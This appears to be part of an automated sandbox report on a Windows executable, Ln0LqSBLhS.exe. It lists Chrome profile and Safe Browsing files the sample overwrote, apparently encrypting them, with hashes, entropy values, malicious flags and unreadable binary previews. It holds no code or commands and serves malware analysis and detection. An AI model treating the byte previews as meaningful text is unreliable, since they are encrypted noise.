                                                                                                                                                                                                    Preview: .......Mn...7.dn.Ff}YZz.....r/.zo...m...(Z......}M...PR..U.X.w3w_d.k.Q...8.+.E..CYJ...S....p..Wl8...~.!h..ss.....V............K.D{.....<..@..ByptN..>.t..H_..B..LXh.O._...'Zt.P....;...n>..JR.C."U.>..b..=%....p]Z.@.G....2...t.\.......Hl.o.l...4E.h.....d?G.....\..S..oI....t..q..2NR.}....#...Y.......q...1..\.?..^.+..I3........3.25...h.aT...+...8..}h.!K.w..4..U.m....(..m...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):508
                                                                                                                                                                                                    Entropy (8bit):7.513735214414549
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:2EXr7cpV4GMZAGROOv9hQqzG5OObmqJYnGj+GMZUmr16IFkcii9a:L72B1YO9OOqyFLZmx6IqbD
                                                                                                                                                                                                    MD5:4785E84702A00AC94EC5B91F1762B18D
                                                                                                                                                                                                    SHA1:48A5B7F84C8DE0E28C8C0D83C473F01CA8ABF73B
                                                                                                                                                                                                    SHA-256:C462471DB43EB57A64678209FEA2D0F9E1EBA2B1E32E2C5C4AF921F5A841624E
                                                                                                                                                                                                    SHA-512:35988429E46841D42CC2344279B33AD1F175F81E720E89A3529CFAC725977BF4959E232B017BAAB4E83331DC8FECC8584545741716347A1E8ED0DF01054B5C73
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .n.m.M..E...|....N..?.b....x....a.+...-..A..I>7..%..%...!.P.........e*.....uw.j[K..y..`BhM.y.2..9..4_.....4...80.-.!..)B.`.~.P1hm:j'u..u.T.yEs...yG.m..1..A.l<".tD.E.4b.l.{.....(........qS..*..2g(~].._..N.)...a..I.Y..&&...,J.g...I...\tB.c..\M.|.x....&'..1>..y.e#....y.=.9p.......v?..p*..0 O... .....$.G..){..-=..V....Nj...Izx...w6P.c89=..E..j...B....q..>..b....u.@..09.R.\...k.\%.!... .Z].+;O..D.&.V..s,.Y...4".A..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.988902467958757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:HANCESLFX34+KA3tJIF1Yhn8KlFvb/QpE+nDWnJPR0J:gNCFRXI1A3tJOY9tldJK
                                                                                                                                                                                                    MD5:35F26AF6F42E3E9DDD589DAFB0CAFFCA
                                                                                                                                                                                                    SHA1:8F76681B54CE8C380B1655A026252454BD934470
                                                                                                                                                                                                    SHA-256:DE00D63277BD051F1583A153CA9A38DFC8C04EDEB2AFE62D588370BDE10B5336
                                                                                                                                                                                                    SHA-512:189287A929E0F61241DB8DCBFD846C1FD6343F3A03E386FB415A92D68CBB2F43E76901B8BC3B952A0E3087C94D3AFCF901C10464CBF278DE9C155C1AC0391424
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: I......c.o....q.....|....+...N6V....)*..C..K.%.........Ee(......s.....2.s....7....z.C....~...`.bO....PZF...`P..P.JLJ.A.l.........;^+. )....Kx.q.*.........F".y&....K.D...b.#5..0.D...*co..^..G.......K6B.\.....T........(.[.N....i<".,.0... ...30..+~...u....o..H.........8R.r.~.=...;..G...R...RW.t...}...hr!._w.H2%..p..JlX#....U..F~">K.W.-.[rZR.A.D.+..V.MBV.y.&...7....Ai).>..$'.....A...GS|...R.......V......%. T.9..u[..........t.....N..K..o/.V..`.X......|.b.N,.IRw.3...'R]@pN.._[a...j.u......o........v|.....b.+T.B.$......IV++....b. ...^..J.i.%.y.m...&....r.^..v...7....fZ8E^....1R.+.-....x.6..k}..F.lZ`.'Z_-C..5...{=*..:.X.Ps$..rn...o1!.....\\F.!...I..*..k.Ab.....L.I^....-p.y,.....:....8W~.{.{.....L.....<.;....~..5..(+..J..../.:...\R.r..y.n..,.K.W.W~,.*jV.(..??...R.F=..I.T'j@.*LO.....:.Cd......&Z.:&}u........k._......W%(.6.S.`...zg`.a...zAb.p.\...,_.>....cS.._M..q.!..q.M..#.5{..6...r..R.h.....D.....7-...\..Yux...D..sb..Q.0.7...*.....~.:.T...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):16713
                                                                                                                                                                                                    Entropy (8bit):7.988954318836082
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:nFuhAPlqrq7X/jNgJLSUklVGnBA0v9OfcxRnVBKooJ:FuQbvCSUysBseRnVAP
                                                                                                                                                                                                    MD5:9D1B5599BA4EA4DF53A161C6642809AF
                                                                                                                                                                                                    SHA1:7F01D046B1D85104173AAA93EE3084D1F43D1660
                                                                                                                                                                                                    SHA-256:EF4842971DC54A926AA487DFD6AE9ABC109E5813232C373081CF2D7ACBF099D9
                                                                                                                                                                                                    SHA-512:F7F33FE4EE01A0ED6F6E60AC2252B73084509ECC0528136C1CDB48F587608D79CEECBAE6E2BA2EB7EC486F521BECAC86625EE8A0C9DCC14FC25C223B6F25321C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...w...R..1...Y..xH..Q<?......&..5...V...)..8.m.k\..z4.x.V..<..Q}.j......Vg.q+....tQ.-.&...A...".......^..2KS...>......0P./].@q..*..+;.I..Q...[.Ek..7.6...MR.<Q..q@.a....-d.C..['..+.).5..Q ..S....=2.vF.......B2...N..*...fp.....5...o!f..(..:..=P<:"d..!.B...y>.0x.....<.....k....sQs...U5..0WT.....P......m.g..7b.4.........+.z..Fr.Y...L...t?.Y....... ..hA..{oT.....FX....j..".!zp....z!.N..8.^..C.S....g".Z..........L..N!h\W..l~...W..:.A.b.sm.U..K.C...L.9=..1.s...Q!h+j..TM..C......1.. ._.J....wp..*.Q...w,..]....>?..5..T.A<..WnF.0.;|[1.4'+...Y..i~9P.!.@.....x...J...=a..y.....4d...8.....(2.ml.:n......".......J.v.....a..Bw.n.]....q..q./_.....g..^....-..F}...`L.......(}9Y......'.A6.........t.6yM..02.u".W..J..a..Q.....`...K.zr..g...}....;d....#.M.......l.7..H...R.7P.kF..>....F../.vP....m2A..=.L2....9.O.}.9....tBE...d8.c5..\{.r.$M.."W.9.I...6...Kr|.....h.z..O..y..4...H..P..r....U.e.>D...P-({...).<........5...@......L.[}.T.io:.l....C.P%d......|-E5zd.S....k..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):361
                                                                                                                                                                                                    Entropy (8bit):7.237374755453232
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:AIc1OfkqCgGTzHYwYosq7IcbFxAmAic/iNVNphrMQ6wxhYmMHiDS75dExcii96Z:lc1syTDYvArxN+iNvPMQro7HiDncii9a
                                                                                                                                                                                                    MD5:87321BB49FDF1A8700F846BC15B9ACA7
                                                                                                                                                                                                    SHA1:812A6A945DAE08F8F467F63262C22F8EA25A855C
                                                                                                                                                                                                    SHA-256:B33C42CCE2AFE8B33C9CA227429065BD62827B1B7D043476010824007E317B91
                                                                                                                                                                                                    SHA-512:BA14D15309424999718B66CC9F366F7418ED75DFEC43F3E854DDC4717FFE834C1AB69DAF52A51AB8E0310F0FDC278D7FA4C0403339EA1DBD5CBDDC3A49CDFECC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......>.4]u...U%..;!...:O.(V...@.9.'..1h^j.<^.vyu...>.,......E..(>!...\f..,.....N..C.7.Y..........V..='.w..T........y.e.. %`.KW.%.G..c.n.e..uK8..!.......3P.<.O.'].Q....-..e.t..Gv..+.3.F.O...N.t...p......m.Nt..-.QQ....X\.KrL..PO..Lj5_..>.L...c...........v...G.W.a.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\CertCsdDownloadWhitelist.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):404
                                                                                                                                                                                                    Entropy (8bit):7.276902571394724
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:BvNOJXKF3qnYC6TmOUhWMqdnIOH0u9MmXcii9a:tNKK1qYCAeWNZH0u9LbD
                                                                                                                                                                                                    MD5:63B3DE74A38E75C8E82906BC1A09B786
                                                                                                                                                                                                    SHA1:6EFE0CA4E853AB734D697B25E7B2807ED76FE6F5
                                                                                                                                                                                                    SHA-256:143101E58D490E7E40C9FFDB6D568B75BD80DC8643F611146DE6F86219AE0CCE
                                                                                                                                                                                                    SHA-512:B8B7E5D12700B9CE0968A1E3BE24EC66530BFC0B790D1C179AE8F246989120C5F6AF79CB5758125F63C12B6D06D952511EF14D1C062BAA736987EDC84BC12E1D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: y)..#..x./._.'....(..O.5.,...5.'....e....>D?dD....E..6..%Z...^.-.EmX.}._..|^Y........%.....E..i.........z........P.j...y@E....v.q3.....b4.W......| ...^C.m..n..F.r@...8.KXF4q[-7.....C.V;....(qGa....`~%.~.....X...a.n.(.u...m. ......I......?;.z...G....U.B..5}... .V.JG.(.W.AB.\..S.{..7wwk.U......x.J.~R.....H5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeExtMalware.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998786228021931
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:4u6qGAmoBOoqluC7a9v8bIiFgTphSrUR/wFsGucKSIW0D:mAmoBOTlU9SdFUh44/Y9SD
                                                                                                                                                                                                    MD5:342D45222D541066B81691B65E25443A
                                                                                                                                                                                                    SHA1:60DBF7D3F91D95A0052BF60CE46F26D00E6DA509
                                                                                                                                                                                                    SHA-256:45EB73F5E206B90A2058A052CE21EF37294C4140F3B48B1E3F4B9DF3D1E0C031
                                                                                                                                                                                                    SHA-512:B2E03ADB28C2131FBAD0F8C1FF388858AA988FAF2094D929AD0C3CDF1E4E1998C537BAD83ED16ACB66BA82B524866B9244A4C00F0D9FDD551AA4D7F7CF1C382A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...s........'\....^i...{......7.c.5.....O..zo19.M....'..%U.v..j....;.8.l....v....=./..d...KS.Q...x.....E..<}.aZM).....|o\.. .n...4.p..sJ.fU..2.{O1...........GN..f.ytl........r4...+....V,5r~....)]....S1<u.UmV...m...r"...V.m......W.B.#Eq...!G....0R...;.9.>.....u.R}...ek.x..ZpL.N6y.!=..C!~J._...D..nA.....M)A.y.6..+.K..EI..!...G..rs^<....j.<u...|.. ..c.....x&.....P.t..1i.......$V`......{g);x.`..d.-3.j...Y.P..j.. y...U..Z..FT..H./d.x.IYI..K......v*B......q.O~(l8+....Y~.I...e~.cu.....j....v..Y...dgA..}....$J..u.t.d.-.Q.b.....fg..7.6.#.6vK..'.m...u.jz..<0...$.v./.._pSb.e.J+.....P......"d-......W{.>C~.1.}.e.;...et..Kbw.0._7..S[=........k..E!H6..%{.O*o.oq..".7.......fr..H|:u.=.2...^E.-j..'....?B......Q.......\......?A.o.r.k~.s..qF..B.?iw.Bk6y....Q..J...G.k#..................V...5..$...c.7U...}._8...zy.......*A..b.wy.j>.[.!..{..2"]....W...n[.......x.".U......G...;.at..?.....D..t.8.g.$. 7.^.Y.oz.l...c...3.v........[...y....z...y.7......}.{...e%.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeUrlClientIncident.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1054
                                                                                                                                                                                                    Entropy (8bit):7.761842249709138
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:87PX+T8aTku1F+eaeqf9poINC+/D1RSrXbD:87POTlz1g3Vv1o+/j2D
                                                                                                                                                                                                    MD5:FC21F0F8C5EC11AA5A3EFF1709E4CE8E
                                                                                                                                                                                                    SHA1:B966905844E66555B0BF45BA9D9BA81C323F1DE9
                                                                                                                                                                                                    SHA-256:B0D429B4BBFCB6ABAF95C6CCA0D20C9ECD8BF49EE003202B1A43B76687CA8D1C
                                                                                                                                                                                                    SHA-512:FC63ADED644AF0BFB5C91561A665CBF540CC328806B0B460134BD95659150A94AC2729DCD52BA294158412AE8306140B62C36494451B9E3D8FCA9E80F8596DF4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: k..,.....E.|V..sJ$0...K..?@..~M)...(.....~.K.W...9)...E.#.#a.!.CXt..&...b.g..r........f}mY.=...[.=.ud...J.-.7JWcq...f.....!~kEyI.3...TKYWq......K.eH..2).......`ZGxd.s..3E........Bv.I..R........{..`.D%e^C..=../I.......3.*:.*3.}k...:...J\..`......Z.....\LP?...O.H4.=".. .....;....M4..@p.q.[.........0...a.pF.&..I.r.5.. .yU..v..~.......z.o=F.MTw.u.q.\.{.9...,.1..,....._.g.T.....Lk.. ..W.....!Vh.s..u.J...63...8I.....P.]......z.e..${....D..#.....G.....f.....^a4.I"4.4.2..C..1.2f#>..E..h..N8...H..)."r.2.Y.L...$.%;T..2T...#a..e.>..R9.].J"......A..>@PPG...0RS.4..,..=.g.D.v........x~...*..""w.C...Y'.]:TUx.@\./ZD&.........'..]........j9...q..$~......H[../9.....#............X.O..>....{.#..D6.e,...n..../..].._........>.....=q....A.......GN....m.$,.Z............t.2.3.E^8.K.M.1...2.c."o..)...>q__...O.&.......a%E...G..5T./o.U\.'......{d.S:1.^d.....`.....*w.-.M$"]..om......V.=V.O..9B44....cxa..v0....MH.q'.i.....|.....&.#J.>t...7....@....5VPEIoxEWaaB5A242LGR5OT4
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\IpMalware.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):435
                                                                                                                                                                                                    Entropy (8bit):7.358504947301477
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Iken7wa4F5F20yDZcdSuGmeLkaYacii9a:I9waCFzDGdLhYabD
                                                                                                                                                                                                    MD5:9DA5ACFED82ACA5FB59016FD956114BC
                                                                                                                                                                                                    SHA1:8E7B1E83FF9FB3047EC30C5CD9713BBB91500E07
                                                                                                                                                                                                    SHA-256:D8676C310F0F7E18ACE8BDD95BF4255FD6AB3AB982ACC4748EA4FA7B302010B9
                                                                                                                                                                                                    SHA-512:350420ABC61A6437CA96DEE900EFC625E26CF717B0A31865019E53B0CB27720117F229B251446E424D7ED8AAAEF15C64339CAB9DDC11AE2F4EE7DA038A15C36B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: FO*[......&.A..2b7~..........V..2.:.....x....NJ,/n ..d.....,.l.+.,....y...ke...B3....w.D..).9L...,-..t./..;.k/{.....h<=...WE.....lW.:......}.x{..dwMPw...@..)..>...~A\x..y8qJ..z.J.....C(.5..~(p.....P..A.d..xz...%q.4...M....)g. ...H*..V*C...E...0....k..L@..H..w..~n.........f.....2.d.?...J....?../.>e...... ...l....+`.. ....u$q..].=*....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlBilling.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):21163
                                                                                                                                                                                                    Entropy (8bit):7.990283229241652
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:Fc6qqLbO63JAK7NULjDRHtZEaq4tpmRb0CGrPQ1hzzY4bR6eMGnXfTYhOOqVpwZj:FcL63BUL3TZENmmx05TkhY4YU8hnkWZj
                                                                                                                                                                                                    MD5:52DF7DFFB03849E367A00A2F8BD5868B
                                                                                                                                                                                                    SHA1:FF84231A110AF532C5859F5B473B8BACB7A35336
                                                                                                                                                                                                    SHA-256:5A75497DFA5C7AF028CE62DB2F1E0289BC7E24E0C0B8801D20C60B5B815887A8
                                                                                                                                                                                                    SHA-512:849296A069DAC921D421B446E040B7A5E039713FE11AD4FB18E736DE1B220F768B44546187EF0AD64C319659066DB44A47EF91B8B788B486A5763D37CD5AC897
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .-........@..&m.X.L.E9...|=.A@...C...V.1.P}=.N..rP..{pn.,..x.v,...."...l.4.9....c$.\z`.."...i&-Kk.7.4.z0......d.{.'fE_.e!.X...1Vv5Y...<z.7.!6y.dk.?Bk7..b^..xYn........U.C.k.c%.I.I..yo .J.z...,.Ml.j<2..y.Poa..*..0..5.......K..D.RI[u...Y.h.......M...?.?."..DU........p64..D.....Gc..o.....x..z..Ca.{ P..[..F.X.^8..2...a....R$..w..tk...X...c#UU2/....K%.....c.u.~u...f...q.+V.14..h.....;n?.a|b.u..J...f...c..C.*ru.d......Xb....Q..!v....7.F.^....?..s.l4.p.f,.VB....O5...P.U..4j.,.g..[u.}}1.......s...a.j.u.i./I...D%.)l.)_=$xT.!|....ro.7.|7A.Z.#.gq..wg...(.^...m.\..H.+...H.-^....w.O.I..q......:...X...1.$n~..9..:t[../.........R^..r..4\....7w.5.....Q.d....#.....b%..3m.~.k....r>.>F>...&I./...6(&^..........;.i8.Q.`G...hJ.........?...o..S....0...z...k3..T.,.....f...-.kS.i..F+.........~W"...J.."0..M+......GM...|R..}6.......93|.RdO.>.G. 2.....!..9^..>!.....tq"..)(.X...K.5.d|N....|.|..6.2M....>....(.}......./x.Fg8SC\.......\....(W.hf...0.6.y.........8
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdDownloadWhitelist.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):33318
                                                                                                                                                                                                    Entropy (8bit):7.994643369711628
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:nFNTTOeazEiPKbQWQOWb+7JrXm8uTHBwAlUCYMe36hHL3JDoQC:nVi6bQWEkg8uTHBfpeqZ23
                                                                                                                                                                                                    MD5:5057230BD19DF4A999BCB82B233E0C4F
                                                                                                                                                                                                    SHA1:CB09869631C884FC50C84E821E9132E2723B459C
                                                                                                                                                                                                    SHA-256:604EB06CF590F946B3B550D1351731E538AFC6F1A4B0114F568A64899960422A
                                                                                                                                                                                                    SHA-512:525D6DF2A181E0F9833AB4C7F1F886578AD5AC68718070B8DBB83A17AB975435CC71E694E1792976F492559AED7B5DF757CC48B5B5113E25CC592F817FD6DCF5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .>..6;.WT.$.qU......uC6.....4wI..G...."./G..j....y....T.....|.p.i..+.)..&.......W.....)>..U...g7.I \?>.5..y0`....c.\.b..........X......Ve9F...r].X.*e.-(...Xij*%.....&[t7..U%..3.;..<.../x.H/..#. lh.pV..2L.x...q..(G.;=...........9z.I...{.'..R.jU.n{..4...0.!.>...C...iwt....bf.Q_'WT..@M+w-.....(W.t%7kxL.!......_.M.R....4...m]......J....#...h.....^#...%....'.G~x..l,@e3....P...6....9.T.Ym.C.(r...:.p....f5..._-..`.'l4._ym.UL.&..8....k.9..}.0L;.Y*Sd./.....<i.a..w..I.T.*.k..6.k....7..<.1.....1.lP.o..w.....VCAh.1....H..K..9/...q..HV>.c.k..e..G.n....s.$...1v....6.\.!...>>7...8.S.!zw./..w.wg..KRm.t^3..woTn.....r...Q.*(.H.Vv..j.z...;.B.)n..=VQ..^.~K......yD..>t2.B.DC..N}.C0.K..x..*.y...I.. .f...k....:Vmrw.B.q*......A..a4^.r...y...}.+......![q8.t.....JG.....#...6...|7c..W....Z.@X........a.mm..to.v D...eB....Y.8[4rc...B...cI../.~1*.%..!..........`..&...}..;.QK..U....0....%.f...N..R`\x..x^.x.[Q.sbh.N..=..rD[.DVF...M.....Q.$....PYr..pt...&..h.x....1..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlCsdWhitelist.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5056
                                                                                                                                                                                                    Entropy (8bit):7.9710660682888825
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:0m3jJF+Scvjz2jF7FZKeKW3Zevn4Un5SJYdUEwtHFk:0MJlmjzWBZeP/5c1EwFu
                                                                                                                                                                                                    MD5:BBC04E88BD9D42C7DBC4613D79627556
                                                                                                                                                                                                    SHA1:DCAF6B63668C9054AF5B50E2EE9BD58F63212C05
                                                                                                                                                                                                    SHA-256:0546F59A9A3AC8C8724D49019D7A97BF6208871C719AFB8707499E8A4C2948E2
                                                                                                                                                                                                    SHA-512:A1BFAB04413504EC341C2787853D46C87374174077FF6FE75975FAFF82661001988F9B78892B2D8F453C43D5E3D6AF8A98FE95A3F1AF4A68CC536011B80CA572
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: cm.Q....B+.......%rH;...F2*X.q....7..Kr.."..........#.t.....$EXs.e.K......z.ns.#....e...d.:......SU5..F.:..NY.n.....[.~.b%Ohk).^......xW....7Q\..<..i]...F0.x.G.|.GB..j..`.....U.. .86.o....q..Y...5..+..}....z...N...........Y.>.q..=....P.....s.7..Z.\ZT..#..R.........y...j.C...z..Cne.9.n...........8$....zi[*8..j.g..Fz...d............cZ.Z..Zvc.'}?.Ne/Y.+..T.4..........K.h..w.U..8......lj..K.K..69.\~..a&1.O...}.G............I}....S..LqP.........h.C.Y....i...A...2/|.D;.Su..M.M....1i.R..2..c..C}..gGq.x..:....XHF..A..m...{.C..x....S..4..v1.....4....cha.i.1.+.^..G....p.J..P~.(D.,s....I.l}...3.Z.Vm.{!. ].4._....+O.ur.N.i6........2$QR.;.Q.%.F..6..*^.<_..W.....|.."U ..AA.......k.yl..Z..V.to1..{.....'P.M...=...D....S.z......l..;.....ZR1..9....G.Wm.t.9.!.u....yJ...#.1.z.^m.~/#;..S......2jj....?.....fw.e...M@9.L<)..{.:T....'/.n.6..O.....,8..~n.....+.Kk......r..p{.=:'=r..d...l..XAH...C....W..-..S.....x._.....o. ...../.o..aC.f..?.4b.z.sv..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlHighConfidenceAllowlist.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998724466346985
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:SCHGr/mymEzXho3Fo7518tNZUAMdk5ojQJ8frxO9CPK+Uep/JG:SCHGz7Fo3Fo4i9dkeQWTg9CgT
                                                                                                                                                                                                    MD5:61F053F77AFBE95047D1D7D4404EFDFF
                                                                                                                                                                                                    SHA1:7886C86556F0E18650EDBA91CB01F3003520DE5C
                                                                                                                                                                                                    SHA-256:3F34735BEA8FBA858DD750D19514BFCDD3CB314307D8CB099AC081E93739C10C
                                                                                                                                                                                                    SHA-512:F0F56BDBB2CA12DE9694B97D7F74F4C4A0B89B5DDE346EFBF34302AB0B3990CBA172E1782F9ADEBC7A7B3D1C39CC050C7F670D995172F7C0ACB819E008D1E922
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: qL....G.I.....B....K.....E;......@...c..<uX..'..|0...x+Z..`.#..Z.......M..P..r.....Abg......UE.P.Y...X.."._.......HU.~......./......J.....~....+.#...*....(i...v.2...!X"..m!Osb.0N....'N.kk....^..Q.w...:..P.H.g....\..9.R.......N..}c.\.U$._.#..Vv..l.....eZD...F..r.<.....J<...}\.-.4..L.l..!.g$.}..TmK.....U..!fxo.].......k..W..-.B...1..}..E.Y....Kd.y..._".#,...W....m...%.......4....l..Sl.6+.s_.G.s...O.U5.....:v....oq^.eR..4..)#gk.q..0...)RY7.X|.}...........Bf.'p..H..:<LX*.7..t1.#=...z....O.^L..9..Q.7+...\.p .JA7].T.;.L......P....[...../......RD......7e....Y. M.lh...p..8s........'<.'..8#6.ln..R...n9..P..h.0......5...6.!k.x1m...{.K....d.n.eM>.l.....r)....*.=X._..Z...m0bp..W..CV....@^...n.........?...5.r.[..xi..3.f%.........|..I'.b.d..d..@........y.gl..Tp..z.S.u.....U...B...I.....}....P....q#.W.]L..42.8.n.Mm......;.....D....B.U>~.<.b.;,....Z|.-..%..1ID..w\.c8,B.J....M.....r....y.^..&Sn.....5.v.2.....@...w..r.p.........n..W.w.S
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Safe Browsing\UrlMalBin.store
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998835038922084
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:3ZzHCVqy136dX7k2lKd08ATy1TIiTAig0695iX/QPZhg:3Zaqy136dX7kHrHp9Zg0695ivKg
                                                                                                                                                                                                    MD5:44AFCA458AB64DC6021F0DDFA90A7F7C
                                                                                                                                                                                                    SHA1:1A195572E4341624298ABF0144AAF0880C768BE2
                                                                                                                                                                                                    SHA-256:A417716D79D5B009F5D8FC7918776004570B47827DE21C457ED6260F3C153804
                                                                                                                                                                                                    SHA-512:1AEF877686E73DED9E1BE703A256D8A49ADBE990A744AE6ABC0E6976C12875D1BE86824E39DE539065C7A87B308491AC634968F77E4AAA6E5856D1C0BBFA2A8F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
